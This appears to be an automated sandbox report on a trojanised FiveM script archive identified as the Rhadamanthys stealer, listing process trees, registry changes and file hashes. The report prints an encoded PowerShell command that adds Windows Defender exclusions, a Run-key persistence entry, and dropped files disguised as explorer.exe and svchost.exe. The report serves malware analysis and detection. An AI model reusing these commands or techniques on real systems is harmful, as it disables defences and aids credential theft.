Analysis Overview
SHA256
38c5b0767ba5a3b10ad9a158b3493ae24096c2993994b06783d8f7266e3b4bc2
Threat Level: Known bad
The file SKRIPTGG-FIVEM-main.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Loads dropped DLL
UPX packed file
Executes dropped EXE
Adds Run key to start application
Unsigned PE
Enumerates physical storage devices
Detects Pyinstaller
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-27 17:10
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral5
Detonation Overview
Submitted
2024-03-27 17:10
Reported
2024-03-27 17:13
Platform
win11-20240221-en
Max time kernel
133s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\license.dll,#1
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-27 17:10
Reported
2024-03-27 17:13
Platform
win11-20240221-en
Max time kernel
149s
Max time network
162s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main.zip
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-27 17:10
Reported
2024-03-27 17:13
Platform
win11-20240221-en
Max time kernel
90s
Max time network
92s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\README.md
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-27 17:10
Reported
2024-03-27 17:11
Platform
win11-20240221-en
Max time kernel
37s
Max time network
33s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2132 created 3056 | N/A | C:\Users\Admin\AppData\Local\svchost.exe | C:\Windows\system32\sihost.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO4C5FB887\launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(28 identical rows; no details recorded for any match)
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" | C:\Users\Admin\explorer.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\Skript.rar
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\Skript.rar"
C:\Users\Admin\AppData\Local\Temp\7zO4C5FB887\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\7zO4C5FB887\launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Users\Admin\AppData\Local\svchost.exe
"C:\Users\Admin\AppData\Local\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
C:\Windows\system32\taskkill.exe
taskkill /f /im "explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zO4C5FB887\launcher.exe
| MD5 | 620024df612c13a4a33cf785384c2086 |
| SHA1 | a6ae999723bea18c6d3acf2c52ed682f6226b7be |
| SHA256 | cd825788095cd61de39d98d6365ed80004cc55a64f4f115ef6bf532617bb0af1 |
| SHA512 | 34d4d8a423d98bf0b8d4f18dc980bed97e9492f0817bb1e2dff99fc8d9d0cfaa2687514eff7717b1310a2c858236614490e980390612901e08b69b6ded451bdd |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | aba4fcf0d72b487887f315202bc43ae4 |
| SHA1 | de51440c742c58f52f3b7cc2a1fcda5abd3d1ca8 |
| SHA256 | 8f312c17c2a525ac9bc0838e4d9f69db5bb20478ffa4880fb3a8b98caf0e25ef |
| SHA512 | fed41d5eb4a61c43bb3032c0d0b3d347d6b89a06d2928155f2e0baa59295ae71d3e689c3c78a584f2db64fd5ab3a06578623a8d41d7055b535c4d2317aef2bf9 |
C:\Users\Admin\AppData\Local\svchost.exe
| MD5 | 8a6f1580a5b9b94d7cd47cc6b1af1b9a |
| SHA1 | e68768afd59e18091d345cb300e859572e8d4c5c |
| SHA256 | bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe |
| SHA512 | 1663a9e0868b3f5d7e1edd30259024e419c2d190ec8c31e76e66aef0c8a0e02da0c829584214b9e2f76cbd349a53bf77d01d03e9b0e9c8a99eb18021b1d53309 |
memory/640-37-0x0000000004910000-0x0000000004946000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI35122\python310.dll
| MD5 | 3f782cf7874b03c1d20ed90d370f4329 |
| SHA1 | 08a2b4a21092321de1dcad1bb2afb660b0fa7749 |
| SHA256 | 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6 |
| SHA512 | 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857 |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 1790216d83f58292e218f047c003963e |
| SHA1 | d6b4af9866f7e099d1db2acbdcb2dbf3e8ce1d1f |
| SHA256 | 3ecb40da9e5660dba9a9ee702215d62c77143e9c5eeee09e241631b20453ba85 |
| SHA512 | b34de3972c8813838fab8925738a53a896e57cdabcec6faa59f4f8811ac50ca49c2888c855c3a62645dbdecb2951bb25b7b6f0735347afc60481c978d6dff096 |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 1c58166821c2996a57c7c5cc94afcc6a |
| SHA1 | a518cb16ba7eebedd6aa66e6e45a910426727444 |
| SHA256 | d36b123038a2d40fcf6fca7ba2a5b20648e0b82b3b65759109d53f4bb430bc89 |
| SHA512 | 44f337db1b4e32247ba4aee5f1d6ff764be8a056fff1871f7f1b2ed452317b071291d436c68266572e1b61236ea195d7e217ab87e63bf23cb5343c50e5bc8058 |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_socket.pyd
| MD5 | 0dd957099cf15d172d0a343886fb7c66 |
| SHA1 | 950f7f15c6accffac699c5db6ce475365821b92a |
| SHA256 | 8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a |
| SHA512 | 3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_lzma.pyd
| MD5 | 7c66f33a67fbb4d99041f085ef3c6428 |
| SHA1 | e1384891df177b45b889459c503985b113e754a3 |
| SHA256 | 32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866 |
| SHA512 | d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_hashlib.pyd
| MD5 | 13f99120a244ab62af1684fbbc5d5a7e |
| SHA1 | 5147a90082eb3cd2c34b7f2deb8a4ef24d7ae724 |
| SHA256 | 11658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b |
| SHA512 | 46c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_decimal.pyd
| MD5 | 2030438e4f397a7d4241a701a3ca2419 |
| SHA1 | 28b8d06135cd1f784ccabda39432cc83ba22daf7 |
| SHA256 | 07d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72 |
| SHA512 | 767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_bz2.pyd
| MD5 | f6e387f20808828796e876682a328e98 |
| SHA1 | 6679ae43b0634ac706218996bac961bef4138a02 |
| SHA256 | 8886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b |
| SHA512 | ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\unicodedata.pyd
| MD5 | dfa1f0cd0ad295b31cb9dda2803bbd8c |
| SHA1 | cc68460feae2ff4e9d85a72be58c8011cb318bc2 |
| SHA256 | 46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10 |
| SHA512 | 7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\select.pyd
| MD5 | 5c66bcf3cc3c364ecac7cf40ad28d8f0 |
| SHA1 | faf0848c231bf120dc9f749f726c807874d9d612 |
| SHA256 | 26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc |
| SHA512 | 034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6 |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libcrypto-1_1.dll
| MD5 | e5aecaf59c67d6dd7c7979dfb49ed3b0 |
| SHA1 | b0a292065e1b3875f015277b90d183b875451450 |
| SHA256 | 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1 |
| SHA512 | 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libffi-7.dll
| MD5 | 6f818913fafe8e4df7fedc46131f201f |
| SHA1 | bbb7ba3edbd4783f7f973d97b0b568cc69cadac5 |
| SHA256 | 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56 |
| SHA512 | 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639 |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_ctypes.pyd
| MD5 | 48ce90022e97f72114a95630ba43b8fb |
| SHA1 | f2eba0434ec204d8c6ca4f01af33ef34f09b52fd |
| SHA256 | 5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635 |
| SHA512 | 7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8 |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\base_library.zip
| MD5 | 483d9675ef53a13327e7dfc7d09f23fe |
| SHA1 | 2378f1db6292cd8dc4ad95763a42ad49aeb11337 |
| SHA256 | 70c28ec0770edefcef46fa27aaa08ba8dc22a31acd6f84cb0b99257dca1b629e |
| SHA512 | f905eb1817d7d4cc1f65e3a5a01bade761bca15c4a24af7097bc8f3f2b43b00e000d6ea23cd054c391d3fdc2f1114f2af43c8bb6d97c1a0ce747763260a864f5 |
C:\Users\Admin\activate.bat
| MD5 | fbcbd43fa00e29f002495e4ab2dc4782 |
| SHA1 | 75aad7a3fa21226bf37ff89da953743d2b650dc0 |
| SHA256 | 7a58a034c76b65053744b7d2a443e487e1993aab50642a62f7f388d223e5f648 |
| SHA512 | 4f26971331fbe1d40e65d493f9417ebcca5e331b61285da2575629b7cd57bdb35ec480cf3ef9a1df48c949360ba9038797575a6181d79b52e1092e4f98bebb3e |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0zqqx0o.n4u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-27 17:10
Reported
2024-03-27 17:13
Platform
win11-20240221-en
Max time kernel
145s
Max time network
96s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2660 created 2556 | N/A | C:\Users\Admin\AppData\Local\svchost.exe | C:\Windows\system32\sihost.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(38 identical rows; no details recorded for any match)
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" | C:\Users\Admin\explorer.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(7 identical rows; no details recorded for any match)
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Users\Admin\AppData\Local\svchost.exe
"C:\Users\Admin\AppData\Local\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
C:\Windows\system32\taskkill.exe
taskkill /f /im "explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 92d05b3c86fe82d20e3eac753053a6a7 |
| SHA1 | bbbc090d9b69fa17bb19c6525288f7b1246eaca6 |
| SHA256 | 990d921f213ecebf5e06bd1a12549fbfb4840e1f8078884792d7ad381bfa79ff |
| SHA512 | 24b16cb38666d70aa52678118849ef01b24697ee53e24dbb3b43ce7aab7bdba315ddc0a91a3cae0116368de098db9bfc1fc30251451020f5fde251a9d82b130e |
C:\Users\Admin\AppData\Local\svchost.exe
| MD5 | 8a6f1580a5b9b94d7cd47cc6b1af1b9a |
| SHA1 | e68768afd59e18091d345cb300e859572e8d4c5c |
| SHA256 | bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe |
| SHA512 | 1663a9e0868b3f5d7e1edd30259024e419c2d190ec8c31e76e66aef0c8a0e02da0c829584214b9e2f76cbd349a53bf77d01d03e9b0e9c8a99eb18021b1d53309 |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 05e0eae62faa65e341349723a7b83e52 |
| SHA1 | e3ef964fbf77100ee158b78e17d22f75bef689af |
| SHA256 | 8bfa320e20a0bc4f239e84cec74e27b53b18775b6a77c3391c21ba0796e5ffc1 |
| SHA512 | 366d3aa5a49d0513502b978d58403d1d3a3d16434b17b3064045d9ab3985e3752e42274b00877133326154743cab041b879d6855baf353eb97ba9f635256175f |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 5f18268da5ba8a5f7fa9bdda6c1e873a |
| SHA1 | 19714031d17d89ae4aed7e7bf2ff68e3d8ccfb1b |
| SHA256 | c3853747e6e8f091f1c0808a16b217382c6710f3ad582722c6988fb1e9515090 |
| SHA512 | 81e10f14d2ddc40deb0eea55983b5c1fb206d64e5f451e8fd315034a824d4105b96c6e4a9cb972fdcc62875fe3b4408a3cb773628d67c453cc8af1e9cd6ab192 |
memory/2660-30-0x0000000000320000-0x000000000038D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48442\python310.dll
| MD5 | 8f7a80754f894ae011141cd9c7228f96 |
| SHA1 | 0490f281cdf2bca0906b287eb64bdb0d6f8f16bd |
| SHA256 | dc3fa53a032575b3b377a56c4ad42e95e6efee27e6b30f88888531cd904d0a7f |
| SHA512 | e4047b1047e4dae0589a869ed77ffb9a4df052742d59bbdfa3f2ed0d8282326a9c173a59d9b7e0000f42e98d37682d21ee45d8db85ae82efd4f4d064dc79c73f |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 18b5595401dc0d358d90a3c4133b9bde |
| SHA1 | 22ecf357907489c4c3217267cea3006c76920dd8 |
| SHA256 | 7c21e7f20bb7e0a41296722c2a75ca450a22582bc47de1b46fe9f78e301b9dbc |
| SHA512 | 2afef0a91a1493c6eeeec7036504a2d4974392c9e80fe1c5b1bc92899c321772d2d9b2ac470621bccc871ff0b04e68878b1902369f339550686bfd90b54741bf |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\python310.dll
| MD5 | ebcfea22527a371fd59bf9c67b07fa4e |
| SHA1 | d0860c1eb4d6644b0e0c24573a0c49dbfa4a56ad |
| SHA256 | 4bec88b5e1ef731689504d5caca04df7e2550e6814f1815b4ecfa3bcad01ca2f |
| SHA512 | d21d345148fbbb664a1ebff0f73f435e2cca5a3d8eb3698398ae2724b9133dd4253343d5addb703b9a781fde5cde66c97c601f0cee6f9e055563f280069d503b |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
memory/4468-38-0x0000000072FA0000-0x0000000073751000-memory.dmp
memory/1724-40-0x00007FFE5F840000-0x00007FFE5FCA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48442\_ctypes.pyd
| MD5 | 48ce90022e97f72114a95630ba43b8fb |
| SHA1 | f2eba0434ec204d8c6ca4f01af33ef34f09b52fd |
| SHA256 | 5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635 |
| SHA512 | 7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8 |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\libffi-7.dll
| MD5 | 6f818913fafe8e4df7fedc46131f201f |
| SHA1 | bbb7ba3edbd4783f7f973d97b0b568cc69cadac5 |
| SHA256 | 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56 |
| SHA512 | 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639 |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\_socket.pyd
| MD5 | 0dd957099cf15d172d0a343886fb7c66 |
| SHA1 | 950f7f15c6accffac699c5db6ce475365821b92a |
| SHA256 | 8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a |
| SHA512 | 3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\_lzma.pyd
| MD5 | 7c66f33a67fbb4d99041f085ef3c6428 |
| SHA1 | e1384891df177b45b889459c503985b113e754a3 |
| SHA256 | 32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866 |
| SHA512 | d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d |